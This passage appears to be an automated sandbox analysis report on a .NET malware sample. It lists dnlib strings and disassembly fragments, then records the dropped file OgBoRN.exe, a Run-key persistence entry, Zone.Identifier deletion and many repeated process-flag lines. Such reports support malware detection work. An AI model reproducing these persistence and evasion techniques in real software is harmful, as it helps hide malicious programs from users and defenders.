              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Managed source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeCode function: 0_2_016640A3 push ebp; iretd 0_2_016640B8
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeCode function: 0_2_0194637F push ebp; iretd 0_2_01946386
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeCode function: 0_2_0336D4F4 push edx; iretd 0_2_0336D4F5
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeCode function: 0_2_0336D4D4 push edx; iretd 0_2_0336D4D5
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeCode function: 0_2_05A5B49C push esp; ret 0_2_05A5B49D
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeCode function: 0_2_05A514F0 pushfd ; iretd 0_2_05A514F1
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeCode function: 0_2_05CF54EF push edx; iretd 0_2_05CF54F6
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeCode function: 0_2_05CF54ED push eax; iretd 0_2_05CF54EE
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeCode function: 0_2_05CF54E3 push ebx; iretd 0_2_05CF54EA
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeCode function: 0_2_05CF5483 push eax; iretd 0_2_05CF548A
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeCode function: 0_2_05CF54BB push eax; iretd 0_2_05CF54C2
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeCode function: 0_2_05CF544B push ebx; iretd 0_2_05CF5452
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeCode function: 0_2_05CF5463 push ebx; iretd 0_2_05CF546A
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeCode function: 0_2_05CF547B push ebx; iretd 0_2_05CF5482
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeCode function: 0_2_05CF5428 push edx; iretd 0_2_05CF5432
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeCode function: 0_2_05CF543B push ebx; iretd 0_2_05CF54AA
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeCode function: 0_2_05CF5433 push edx; iretd 0_2_05CF543A
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeCode function: 0_2_05CF5F97 push esi; iretd 0_2_05CF5F9E
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeCode function: 0_2_05CF5F53 push esi; iretd 0_2_05CF5F62
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeCode function: 0_2_05CF5F1F push esi; iretd 0_2_05CF5F2A
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeCode function: 0_2_05CF5ED8 push esi; iretd 0_2_05CF5EE2
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeCode function: 0_2_05CF600B push edi; iretd 0_2_05CF601E
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeCode function: 0_2_05CF1367 push cs; iretd 0_2_05CF1376
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeCode function: 0_2_05CF3301 push cs; iretd 0_2_05CF3311
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 3_2_021340A3 push ebp; iretd 3_2_021340B8
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 3_2_05E5637F push ebp; iretd 3_2_05E56386
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 3_2_06567735 push es; ret 3_2_06569020
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 3_2_06567735 push es; retf 5674h3_2_0656911C
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 3_2_06567735 push es; ret 3_2_06569138
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 3_2_06563A85 push es; retn 563Bh3_2_06564288
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeCode function: 3_2_06561C76 push es; iretd 3_2_06561C7C
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeFile created: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeJump to dropped file
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OgBoRNJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OgBoRNJump to behavior

              Hooking and other Techniques for Hiding and Protection

              barindex
              Hides that the sample has been downloaded from the Internet (zone.identifier)
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeFile opened: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe:Zone.Identifier read attributes | deleteJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
